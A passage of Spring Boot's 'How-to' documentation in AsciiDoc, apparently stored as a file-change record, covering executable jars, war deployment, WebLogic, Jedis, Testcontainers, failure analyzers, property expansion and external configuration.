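to compress the entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class` is available).\n. 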
Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class` attribute in the manifest and specify the other properties it needs as manifest entries -- principally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and applications are deployed by default on an embedded Reactor Netty server, War deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a `SpringBootServletInitializer` subclass and override its `configure` method.\nDoing so makes use of Spring Framework's Servlet 3.0 support and lets you configure your application when it is launched by the servlet container.\nTypically, you should update your application's main class to extend `SpringBootServletInitializer`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war file rather than a jar file.\nIf you use Maven and `spring-boot-starter-parent` (which configures Maven's war plugin for you), all you need to do is to modify `pom.xml` to change the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the project, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not interfere with the servlet container to which the war file is deployed.\nTo do so, you need to mark the 
embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration.\nAmong other limitations, `compileOnly` dependencies are not on the test classpath, so any web-based integration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>, marking the embedded servlet container dependency as provided produces an executable war file with the provided dependencies packaged in a `lib-provided` directory.\nThis means that, in addition to being deployable to a servlet container, you can also run your application by using `java -jar` on the command line.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to a Spring Boot application.\nTo do so, throw away the code that creates your `ApplicationContext` and replace it with calls to `SpringApplication` or `SpringApplicationBuilder`.\nSpring MVC web applications are generally amenable to first creating a deployable war application and then migrating it later to an executable war or jar.\nSee the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting Started Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a class called `Application`) and adding the Spring Boot `@SpringBootApplication` annotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) 
to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here.\nThere might be some beans you can remove later and let Spring Boot provide its own defaults for them, but it should be possible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or `\/META-INF\/resources`) in the classpath root.\nThe same applies to `messages.properties` (which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further changes.\nIf you have other features in your application (for instance, using other servlets or filters), you may need to add some configuration to your `Application` context, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the container as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a `<filter\/>` and `<filter-mapping\/>`); see the sketch after this list.\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in your `Application`.\n Alternatively, simple cases where annotation configuration is heavily used already can be recreated in a few lines as `@Bean` definitions.
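\n\nThe following sketch shows one way to register a filter as a bean (the `MyCustomFilter` class and its URL pattern are hypothetical):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean<MyCustomFilter> myCustomFilter() {\n\t\t\/\/ Equivalent to a <filter\/> and <filter-mapping\/> in web.xml\n\t\tFilterRegistrationBean<MyCustomFilter> registration = new FilterRegistrationBean<>(new MyCustomFilter());\n\t\tregistration.addUrlPatterns(\"\/api\/*\");\n\t\treturn registration;\n\t}\n----\n\nOnce the war file is working, you can make it executable by adding a `main` method to your `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you need to share the customizations of the builder in a method that is available both to the `SpringBootServletInitializer` callback and to the `main` method in a class similar to the following:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different techniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring Servlet 3.0+ initializer support classes.\nNormally, all the code from an existing `WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`.\nIf your existing application has more than one 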
`ApplicationContext` (for example, if it uses `AbstractDispatcherServletInitializer`) then you might be able to combine all your context sources into a single `SpringApplication`.\nThe main complication you might encounter is if combining does not work and you need to maintain the context hierarchy.\nSee the <<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for examples.\nAn existing parent context that contains web-specific features usually needs to be broken up so that all the `ServletContextAware` components are in the child context.\n\nApplications that are not already Spring applications might be convertible to Spring Boot applications, and the previously mentioned guidance may help.\nHowever, you may yet encounter problems.\nIn that case, we suggest https:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow with a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet initializer *directly* implements `WebApplicationInitializer` (even if you extend from a base class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version rather than the version that was pre-installed with the server.\nYou can do so by adding a `WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses https:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce].\nYou need to exclude that dependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead.\nSpring Boot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in 
Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-data-redis') {\n\t\t exclude group: 'io.lettuce', module: 'lettuce-core'\n\t\t}\n\t\timplementation 'redis.clients:jedis'\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-testcontainers]]\n=== Use Testcontainers for Integration Testing\nThe https:\/\/www.testcontainers.org\/[Testcontainers] library provides a way to manage services running inside Docker containers.\nIt integrates with JUnit, allowing you to write a test class that can start up a container before any of the tests run.\nTestcontainers is especially useful for writing integration tests that talk to a real backend service such as MySQL, MongoDB, or Cassandra.\nTestcontainers can be used in a Spring Boot test as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootTest\n\t@Testcontainers\n\tclass ExampleIntegrationTests {\n\n\t\t@Container\n\t\tstatic Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n\t}\n----\n\nThis will start up a Docker container running Neo4j (if Docker is running locally) before any of the tests are run.\nIn most cases, you will need to configure the application using details from the running container, such as container IP or port.\n\nThis can be done with a static `@DynamicPropertySource` method that allows adding dynamic property values to the Spring Environment.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootTest\n\t@Testcontainers\n\tclass ExampleIntegrationTests {\n\n\t\t@Container\n\t\tstatic Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n\t\t@DynamicPropertySource\n\t\tstatic void neo4jProperties(DynamicPropertyRegistry registry) {\n\t\t\tregistry.add(\"spring.data.neo4j.uri\", neo4j::getBoltUrl);\n\t\t}\n\n\t}\n----\n\nThe above configuration allows Neo4j-related beans in the application to communicate with Neo4j running inside the Testcontainers-managed Docker container.\n","old_contents":"[[howto]]\n= \"`How-to`\" Guides\ninclude::attributes.adoc[]\n\nThis section provides answers to some common '`how do I do that...`' questions that often arise when using Spring Boot.\nIts coverage is not exhaustive, but it does cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out https:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has already provided an answer.\nThis is also a great place to ask new questions (please use the `spring-boot` tag).\n\nWe are also more than happy to extend this section.\nIf you want to add a '`how-to`', send us a {spring-boot-code}[pull request].\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{spring-boot-module-api}\/diagnostics\/FailureAnalyzer.html[`FailureAnalyzer`] is a great way to 
intercept an exception on startup and turn it into a human-readable message, wrapped in a {spring-boot-module-api}\/diagnostics\/FailureAnalysis.html[`FailureAnalysis`].\nSpring Boot provides such an analyzer for application-context-related exceptions, JSR-303 validations, and more.\nYou can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks for the presence of a specified exception type in the exception to handle.\nYou can extend from that so that your implementation gets a chance to handle the exception only when it is actually present.\nIf, for whatever reason, you cannot handle the exception, return `null` to give another implementation a chance to handle the exception.
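\n\nThe following sketch shows what such an analyzer might look like (the `ProjectConstraintViolationException` type and the message text are hypothetical):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic class ProjectConstraintViolationFailureAnalyzer\n\t\t\textends AbstractFailureAnalyzer<ProjectConstraintViolationException> {\n\n\t\t@Override\n\t\tprotected FailureAnalysis analyze(Throwable rootFailure, ProjectConstraintViolationException cause) {\n\t\t\t\/\/ The description explains what went wrong; the action suggests how to fix it\n\t\t\treturn new FailureAnalysis(\"A project constraint was violated: \" + cause.getMessage(),\n\t\t\t\t\t\"Review the project configuration and correct the offending value.\", cause);\n\t\t}\n\n\t}\n----\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer` can implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but sometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot `ApplicationContext`.\nYou can see it if you enable `DEBUG` logging output.\nIf you use the `spring-boot-actuator` (see <<production-ready-features.adoc#production-ready,the Actuator chapter>>), there is also a `conditions` endpoint that renders the report in JSON.\nUse that endpoint to debug the application and see what features have been added (and which have not been added) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc.\nWhen reading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources.\n Pay special attention to the `+@Conditional*+` annotations to find out what features they enable and when.\n Add `--debug` to the command line or a System property `-Ddebug` to get a log on the console of all the auto-configuration decisions that were made in your app.\n In a running application with actuator enabled, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX equivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`]) and read from there the available external configuration options.\n The `@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to external properties.\n Thus, `ServerProperties` has `prefix=\"server\"` and its configuration properties are `server.port`, `server.address`, and others.\n In a running application with actuator enabled, look at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values explicitly out of the `Environment` in a relaxed manner.\n It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in response to SpEL expressions, normally evaluated with 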
placeholders resolved from the `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that are used to apply customizations to the context or environment.\nSpring Boot loads a number of such customizations for use internally from `META-INF\/spring.factories`.\nThere is more than one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers` methods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or `context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some even before the context is created) and then registers the listeners for events published by the `ApplicationContext` as well.\nSee \"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners,Application Events and Listeners>>`\" in the '`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is refreshed by using `EnvironmentPostProcessor`.\nEach implementation should be registered in `META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`.\nFor instance, the following example loads a YAML configuration file from the classpath:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources that Spring Boot loads by default.\nIt is therefore possible to get the location of the file from the environment.\nThe preceding example adds the `custom-resource` property source at the end of the list so that a key defined in any of the usual other locations takes precedence.\nA custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a convenient way to load a custom resource in the `Environment`, we do not recommend it.\nSuch property sources are not added to the `Environment` until the application context is being refreshed.\nThis is too late to configure certain properties such as `+logging.*+` and `+spring.main.*+` which are read before refresh begins.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `SpringApplicationBuilder` class to create parent\/child `ApplicationContext` hierarchies.\nSee \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\" in the '`Spring Boot features`' section for more information.
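\n\nAs a minimal sketch (the `ParentConfig` and `ChildConfig` classes are hypothetical), a parent\/child hierarchy can be declared fluently:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tnew SpringApplicationBuilder()\n\t\t\t.sources(ParentConfig.class)\n\t\t\t.child(ChildConfig.class)\n\t\t\t.run(args);\n----\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services).\nIf you want to execute some code in a `main` method but also bootstrap a Spring application to set up the infrastructure to use, you can use the `SpringApplication` features of Spring 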
Boot.\nA `SpringApplication` changes its `ApplicationContext` class, depending on whether it thinks it needs a web application or not.\nThe first thing you can do to help it is to leave server-related dependencies (such as the servlet API) off the classpath.\nIf you cannot do that (for example, you run two applications from the same code base), then you can explicitly call `setWebApplicationType(WebApplicationType.NONE)` on your `SpringApplication` instance or set the `applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a `CommandLineRunner` and dropped into the context as a `@Bean` definition.
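\n\nA minimal sketch of such a runner, defined as a `@Bean` (the bean name and the logic are illustrative):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic CommandLineRunner businessLogic() {\n\t\t\/\/ Runs once the ApplicationContext has been fully started\n\t\treturn (args) -> System.out.println(\"Running with arguments: \" + Arrays.toString(args));\n\t}\n----\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\nThis section includes topics about setting and reading properties and configuration settings and their interaction with Spring Boot applications.\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build configuration, you can automatically expand them using the existing build configuration.\nThis is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource filtering.\nIf you use the `spring-boot-starter-parent`, you can then refer to your Maven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is applied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add `src\/main\/resources` directly to the classpath (for hot reloading purposes).\nDoing so circumvents the resource filtering and this feature.\nInstead, you can use the `exec:java` goal or customize the plugin's configuration.\nSee the {spring-boot-maven-plugin-docs}#getting-started[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside the `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring placeholders (such as `$\\{placeholder}`) in your configuration.\nIf that property is not set to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the Java plugin's `processResources` task to do so, as shown in the following 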
example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms `${..}` tokens.\nThe `${..}` style conflicts with Spring's own property placeholder mechanism.\nTo use Spring property placeholders together with automatic expansion, escape the Spring property placeholders as follows: `\\${..}`.\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as you create the application to modify its behavior.\nAlternatively, you can externalize the configuration by setting properties in `+spring.main.*+`.\nFor example, in `application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application is not starting an embedded web server.\n\nProperties defined in external configuration override the values specified with the Java API, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses three sources for the `ApplicationContext` (in the following order): `demo.MyApp`, `com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a defined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in the '`Spring Boot features`' section for the exact order).\n\nYou can also provide the following System properties (or environment variables) to change the behavior:\n\n* configprop:spring.config.name[] (configprop:spring.config.name[format=envvar]): Defaults to `application` as the root of the file name.\n* configprop:spring.config.location[] (configprop:spring.config.location[format=envvar]): The file to load (such as a classpath resource or a URL).\n A separate `Environment` property source is set up for this document and it can be overridden by system properties, environment variables, or the command line.\n\nNo matter what you set in the environment, Spring Boot always loads `application.properties` as described above.\nBy default, if YAML is used, then files with the '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the candidates it has not found at `TRACE` level.\n\nSee 
{spring-boot-module-code}\/context\/config\/ConfigFileApplicationListener.java[`ConfigFileApplicationListener`] for more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to set configuration properties on the command line.\nYou can enable this behavior by using placeholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=${port:8080}\n----
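\n\nYou can then launch the application with the short argument (the jar name is illustrative):\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar demo-0.0.1-SNAPSHOT.jar --port=9000\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter token of the `maven-resources-plugin` has been changed from `+${*}+` to `@` (that is, `@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style placeholders.\nIf you have enabled Maven filtering for the `application.properties` directly, you may want to also change the default filter token to use https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku or Cloud Foundry.\nIn those two platforms, the `PORT` environment variable is set automatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external properties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already included if you use the `spring-boot-starter`).\nA YAML file is parsed to a Java `Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it is one level deep and has period-separated keys, as many people are used to with `Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in the '`Spring Boot features`' section for more information about YAML.\n\n\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property (configprop:spring.profiles.active[]) or an OS environment variable (configprop:spring.profiles.active[format=envvar]).\nAlso, you can launch your application with a `-D` argument (remember to put it before the main class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown in the following 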
